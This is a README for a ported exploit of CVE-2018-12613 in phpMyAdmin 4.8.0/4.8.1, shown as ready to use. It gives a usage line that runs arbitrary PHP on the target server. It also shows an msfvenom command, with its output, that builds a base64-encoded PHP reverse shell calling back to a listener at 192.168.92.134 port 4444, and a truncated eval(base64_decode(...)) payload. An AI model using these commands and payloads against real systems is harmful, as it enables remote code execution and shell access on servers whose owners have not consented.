Modified standalone exploit ported for Python 3# CVE-2018-12613
Modified standalone exploit ported to Python 3. Tested on Python 3.7.3, phpMyAdmin 4.8.1 running on Ubuntu 16.04
Works on Linux only. Original exploit [by SSD](https://github.com/ssd-secure-disclosure/advisories/tree/master/SSD%20Advisory%20-%203700). All credits to them.
## Changes made
1. Added function to exit if provided phpMyAdmin username/password is correct
2. Added function to check if version is vulnerable (4.8.0 or 4.8.1)
3. Converted variables to either bytes or strings strictly; Python 3 disallows mixing. See [this](https://portingguide.readthedocs.io/en/latest/strings.html).
## Usage:
`python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http:///[url-phpMyAdmin] –P ”phpcredits();”`
Results of php code stored in `results.html`
### For reverse shell
```
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php
```
Use the `msfvenom` php payload in place of `phpcredits();` above
`root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php`
> eval(base64_decode(ICAg...gfQo));
[4.0K] /data/pocs/8da2d7d7ddb845171ed7272c3cecf3963c285736
├── [4.4K] CVE-2018-12613.py
└── [1.3K] README.md
0 directories, 2 files